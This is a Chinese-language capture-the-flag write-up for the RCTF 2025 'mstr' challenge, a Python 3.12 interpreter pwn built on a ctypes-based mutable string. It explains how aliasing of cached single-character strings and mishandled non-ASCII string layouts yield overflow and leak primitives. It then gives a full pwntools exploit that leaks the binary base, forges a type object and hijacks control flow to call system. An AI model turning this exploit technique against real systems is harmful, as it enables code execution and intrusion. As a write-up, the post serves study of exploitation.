RCTF 2025 mstr Writeup
少见的 Python interpreter pwn,漏洞点也很有意思。
Challenge
Python 3.12.4
import ctypes
from typing import Union, List, Dict
STRPTR_OFFSET = 0x28
LENPTR_OFFSET = 0x10
# Forward declaration: binds the name MutableStr before the real class body
# runs, so the Union[str,MutableStr] annotation on __add__ can be evaluated.
class MutableStr:
    pass
# A "mutable string": wraps a Python str and edits that str object's memory
# in place through ctypes, at fixed byte offsets from id(data).
class MutableStr:
    def __init__(self, data:str):
        # Keep a reference to the str and remember id() of it; every ctypes
        # access below uses that value as the object's memory address.
        self.data = data
        self.base_ptr = id(self.data)
        # "" means "no explicit limit"; see _add_str for the default.
        self.max_size_str = ""
    def set_max_size(self, max_size_str):
        # Accept the new limit only if its integer value is below the current
        # length rounded up to a multiple of 8; otherwise print a message.
        # NOTE: the str object itself is stored (not the parsed int) and
        # _add_str re-parses it on every call, so a later in-place change to
        # that same str object changes the effective limit.
        if int(max_size_str) < ((len(self)+7) & ~7):
            self.max_size_str = max_size_str
        else:
            print("can't set max_size: too big")
    def __repr__(self):
        # Returns the wrapped str itself (no quoting or class name).
        return self.data
    def __str__(self):
        return self.__repr__()
    def __len__(self):
        # Length is read as a 64-bit integer at base_ptr + LENPTR_OFFSET
        # instead of calling len(self.data).
        # base_ptr is never set to None in the code shown here.
        if self.base_ptr is None:
            return 0
        ptr = ctypes.cast(self.base_ptr + LENPTR_OFFSET, ctypes.POINTER(ctypes.c_int64))
        return ptr[0]
    def __getitem__(self, key:int):
        # Only int keys in [0, len(self)) are allowed; the character is then
        # fetched through ordinary str indexing.
        # Raises NotImplementedError for non-int keys, RuntimeError when the
        # key is out of range.
        if not isinstance(key, int):
            raise NotImplementedError
        if key >= len(self) or key < 0:
            raise RuntimeError("get overflow")
        return self.data[key]
    def __setitem__(self, key:int, value:int):
        # Overwrite one byte of the wrapped str in place.
        # Raises NotImplementedError when key or value is not an int,
        # RuntimeError when key is outside [0, len(self)).
        if not isinstance(value, int):
            raise NotImplementedError("only support integer value")
        if not isinstance(key, int):
            raise NotImplementedError("only support integer key")
        if key >= len(self) or key < 0:
            raise RuntimeError(f"set overflow: length:{len(self)}, key:{key}")
        # The byte written lives at base_ptr + STRPTR_OFFSET + key.
        strptr = ctypes.cast(self.base_ptr + STRPTR_OFFSET, ctypes.POINTER(ctypes.c_char))
        strptr[key] = value
    def __add__(self, other:Union[str,MutableStr]):
        # Non-mutating concatenation: builds a new MutableStr from a normal
        # str concatenation. Raises NotImplementedError for other operands.
        if isinstance(other, str):
            return MutableStr(self.data + other)
        if isinstance(other, MutableStr):
            return MutableStr(self.data + other.data)
        raise NotImplementedError()
    def _add_str(self, other):
        # In-place append of the str `other`; always returns self.
        # The limit is the current length rounded up to a multiple of 8,
        # unless set_max_size stored an explicit value.
        if self.max_size_str == "":
            max_size = (len(self)+7) & ~7
        else:
            max_size = int(self.max_size_str)
        if len(self)+len(other) <= max_size:
            other_len = len(other)
            # Both pointers are taken at STRPTR_OFFSET from the respective
            # object addresses, and exactly other_len bytes are copied.
            strptr = ctypes.cast(self.base_ptr + STRPTR_OFFSET, ctypes.POINTER(ctypes.c_char))
            otherstrptr = ctypes.cast(id(other) + STRPTR_OFFSET, ctypes.POINTER(ctypes.c_char))
            for i in range(other_len):
                strptr[i+len(self)] = otherstrptr[i]
            # Writing a terminator is disabled, so this branch does nothing.
            if len(self)+other_len < max_size:
                # strptr[len(self)+other_len] = 0
                pass
            # Grow the stored length field only after all bytes are copied.
            ctypes.cast(self.base_ptr + LENPTR_OFFSET, ctypes.POINTER(ctypes.c_int64))[0] += other_len
        else:
            print("Full!")
        return self
    def __iadd__(self, other):
        # `+=` appends in place for str and MutableStr operands; any other
        # operand type is ignored and self is returned unchanged.
        if isinstance(other, str):
            return self._add_str(other)
        if isinstance(other, MutableStr):
            return self._add_str(other.data)
        return self
def new_mstring(data:str) -> MutableStr:
    # Thin factory: wraps `data` in a MutableStr without copying it.
    return MutableStr(data)
mstrings:List[MutableStr] = []
def main():
    # Command loop over the global `mstrings` list. Each input line is split
    # on whitespace into `cmd data [values...]`:
    #   new <text>                  append a new MutableStr
    #   set_max <max_size> <idx>    call set_max_size(<max_size>) on entry idx
    #   + <idx1> <idx2>             append the concatenation as a new entry
    #   += <idx1> <idx2>            append entry idx2 to entry idx1 in place
    #   print_max <idx>             print the stored max_size_str
    #   print <idx>                 print the wrapped str
    #   modify <idx> <offset> <val> write integer <val> at <offset>
    # The loop ends on EOF; any other exception is printed and the loop goes on.
    while True:
        try:
            # A line with fewer than two tokens fails to unpack here and is
            # reported by the generic handler below.
            cmd, data, *values = input("> ").split()
            if cmd == "new":
                mstrings.append(new_mstring(data))
            if cmd == "set_max":
                # Note the argument order: the size comes first, the index second.
                idx = int(values[0])
                if idx >= len(mstrings) or idx < 0:
                    print("invalid index")
                    continue
                # `data` is passed on as a str, not converted to int here.
                mstrings[idx].set_max_size(data)
            if cmd == "+":
                idx1 = int(data)
                idx2 = int(values[0])
                if idx1 < 0 or idx1 >= len(mstrings) or idx2 < 0 or idx2 >= len(mstrings):
                    print("invalid index")
                    continue
                mstrings.append(mstrings[idx1]+mstrings[idx2])
            if cmd == "+=":
                idx1 = int(data)
                idx2 = int(values[0])
                if idx1 < 0 or idx1 >= len(mstrings) or idx2 < 0 or idx2 >= len(mstrings):
                    print("invalid index")
                    continue
                # idx1 == idx2 is allowed: an entry can be appended to itself.
                mstrings[idx1] += mstrings[idx2]
            if cmd == "print_max":
                idx = int(data)
                if idx >= len(mstrings) or idx < 0:
                    print("invalid index")
                    continue
                print(mstrings[idx].max_size_str)
            if cmd == "print":
                idx = int(data)
                if idx >= len(mstrings) or idx < 0:
                    print("invalid index")
                    continue
                print(mstrings[idx].data)
            if cmd == "modify":
                idx = int(data)
                offset = int(values[0])
                val = values[1]
                if idx >= len(mstrings) or idx < 0:
                    print("invalid index")
                    continue
                # Bounds and type checks for offset/val happen in __setitem__.
                mstrings[idx][offset] = int(val)
        except EOFError:
            break
        except Exception as e:
            print(f"error: {e}")
print("hello!", flush=True)
main()
省流:Python 的 str 不可变,题目用 ctypes 强行实现了一个可变字符串 MutableStr。
赛中手写了个 fuzzer,发现了一个很有意思的崩溃,但一直没看懂。(好在让我意识到 CPython 对单字节字符串有特别的优化,见下文。)
hello!
> new O
> modify 0 0 0
这样就有可能 SIGSEGV,原因是空指针解引用。
Bug
CPython 给每个单字节字符串预先分配了一个对象,位于 python 本身的数据段,所有相同的单字节字符串都指向同一个地方。如果我们先 new 一个 MutableStr '6',将另一个 MutableStr 的 max_size_str 设置成 '6',那么接下来改 '6' 就是改另一个 MutableStr 的 max_size_str。(考虑到最终 getshell 时的一些细节,需要用 6 而不是 7。)
hello!
> new 6
> new 0
> set_max 6 1
> print_max 1
6
> += 0 0
> print_max 1
66
我们由此可以获得任意长溢出写。
CPython 用 PyASCIIObject 存储纯单字节字符串,记录长度,不依赖尾空字节。如果字符串里有非 ASCII 字符,就会改用 PyCompactUnicodeObject,此时 0x28(STRPTR_OFFSET)偏移处新增两个 8 字节字段 utf8_length 和 utf8。(见源码 Python-3.12.4/Include/cpython/unicodeobject.h)
/* Header of an ASCII-only compact str. Offsets assume a 64-bit build. */
typedef struct {
    PyObject_HEAD                 /* 0x00: 16-byte object header, including the type pointer */
    Py_ssize_t length;            /* 0x10: number of code points (LENPTR_OFFSET in mstr.py) */
    Py_hash_t hash;               /* 0x18 */
    struct {
        unsigned int interned:2;
        unsigned int kind:3;
        unsigned int compact:1;
        unsigned int ascii:1;
        unsigned int statically_allocated:1;
        unsigned int :24;
    } state;                      /* 0x20: bit-field flags, padded to 8 bytes */
} PyASCIIObject;                  /* size 0x28: ASCII data starts here (STRPTR_OFFSET) */
typedef struct {
PyASCIIObject _base;
Py_ssize_t utf8_length;
char *utf8;
} PyCompactUnicodeObject;
数据紧随这两个结构体之后(8 字节对齐)。CPython 存储 Unicode 字符采用定长编码,通常 UCS2(类似 UTF16),遇到大于两字节的字符则 UCS4。当 utf8 不为 NULL 时,print 就不再重新 UCS2 转 UTF8,而是直接根据这两个字段打印字符串。
但是 MutableStr 没有正确处理非 ASCII 情况,当拼接字符串时仍然向原偏移处即字符串末尾前 16 字节处写入字符串并且增加长度(注意 Python 的字符串长度是指 Unicode 码点数),我们可以结合篡改 max_size_str 从而泄露 Unicode 字符串 data 后任意偏移大约 16 字节的信息。
Exploit
笔者十分不喜欢 glibc heap pwn。以下解法不依赖特定 libc 版本,也没有 🏠。
每个 PyObject 都有一个 PyTypeObject 指针,表示对象的类型,其中有类型信息和各种操作的虚函数指针等。由于动态分配的对象在 pymalloc(不大于 512 字节)或 libc 堆上,所以理所应当可能有相邻对象的 PyTypeObject 指针,从而泄露 PIE 基址。
这里有个细节,当实际使用 print 命令打印这个字符串时,泄露出来的信息会变成其他字符。这是 builtin_print 时编码转换导致的,我们的脚本需要将实际输出的内容看做 UTF8 字节流再转为 UCS2 字节流以获取原始泄露信息。
得到基址后,我们再越界写篡改刚才提到的预先分配好的单字节字符串对象的 PyTypeObject 指针,提前伪造虚函数表,print 伪造了虚函数表的 data 从而劫持控制流。
Exp:
from pwn import *
# pwntools setup: amd64 Linux target, debug-level logging, konsole for gdb.
context(arch='amd64', os='linux', log_level='debug', terminal = ['konsole', '-e'])
binary = './python'
# Run the challenge script under the local interpreter binary.
io = process([binary, 'mstr.py'])
e = ELF(binary)
# NOTE: itob is not used in the part of the script shown here.
itob = lambda x: str(x).encode()
print_leaked = lambda name, addr: success(f'{name}: 0x{addr:x}')
def new_bytes(content: bytes, index: int) -> None:
    # Create an mstring holding arbitrary bytes: allocate it as len(content)
    # NUL characters, then patch each byte with a `modify` command.
    # `index` must be the slot the new mstring receives in the target's list.
    io.sendlineafter(b'> ', b'new ' + b'\x00' * len(content))
    # Lower the log level while sending the per-byte commands.
    context.log_level='info'
    for i, c in enumerate(content):
        io.sendlineafter(b'> ', f'modify {index} {i} {c}'.encode())
    context.log_level='debug'
# mstring 0: non-ASCII string, later used for the out-of-bounds read.
io.sendlineafter(b'> ', 'new 瑞克'.encode())
# mstring 1: the one-character string '\x00'.
io.sendlineafter(b'> ', 'new \x00'.encode()) # for fake type
# mstring 2: the one-character string '6'.
io.sendlineafter(b'> ', 'new 6'.encode())
# Set the limit of mstrings 0 and 1 to '6'. Per the write-up, CPython shares
# one object per one-character string, so both limits alias mstring 2's data.
io.sendlineafter(b'> ', b'set_max 6 0')
io.sendlineafter(b'> ', b'set_max 6 1')
# Append mstring 2 to itself twice: '6' -> '66' -> '6666'.
io.sendlineafter(b'> ', b'+= 2 2')
io.sendlineafter(b'> ', b'+= 2 2') # max size 6666
# mstring 3: 20 NUL characters. Appending it to mstring 0 raises mstring 0's
# stored length by 20, so `print 0` outputs memory beyond the original text.
io.sendlineafter(b'> ', b'new ' + b'\x00' * 20)
io.sendlineafter(b'> ', '+= 0 3'.encode())
io.sendlineafter(b'> ', 'print 0'.encode())
# The target prints UTF-8; re-encode as UTF-16-LE to recover the raw 2-byte units.
data_leaked = io.recvline(drop=True).decode('utf-8').encode('utf-16-le')
# for i in range(0, len(data_leaked) - 8, 8):
# print(f'{u64(data_leaked[i: i + 8]):#x}')
# Treat the 8 bytes at offset 16 as a pointer to PyBytes_Type to get the base.
e.address = u64(data_leaked[16:24]) - e.sym['PyBytes_Type']
# A base that is not page-aligned means the leak was something else; give up.
if e.address % 0x1000 != 0:
    exit(1)
print_leaked('elf_base', e.address)
# Debugging aid. The nested single quotes inside this f-string need
# Python 3.12+ (PEP 701). `awa` is presumably gdb's short form of `awatch`.
gdb.attach(io, f'awa *{e.sym['_PyRuntime'] + 62000}')
# modify PyTypeObject ptr & construct fake PyTypeObject
# Payload (stored as mstring 4): 7 filler bytes, a 40-byte cyclic pattern with
# two substitutions, 88 NUL bytes, then the PLT address of system.
# _PyRuntime + 62000 is presumably where the forged type object ends up --
# confirm against the target binary.
new_bytes(b'cafebab' + cyclic(40).replace(b'caaadaaa', p64(e.sym['_PyRuntime'] + 62000)).replace(
    # For some reason, `ph\x00` will become `sh\x00` (+= 3)
    b'aaaa', b'ph\x00\x00') + b'\x00' * 88 + p64(e.plt['system']), 4)
# Append the payload to mstring 1; its limit is now 6666, so the write runs
# far past the one-character string.
io.sendlineafter(b'> ', b'+= 1 4')
# mstring 5: the one-character string '\x01'.
io.sendlineafter(b'> ', 'new \x01'.encode()) # fake type victim
io.sendlineafter(b'> ', 'print 5'.encode()) # invoke virtual function
io.interactive()
由于堆布局每次运行时不同,只是有概率成功(如果加上堆喷可以做到每次成功)。
🐍🔥🐍🔥🐍🔥🐍🔥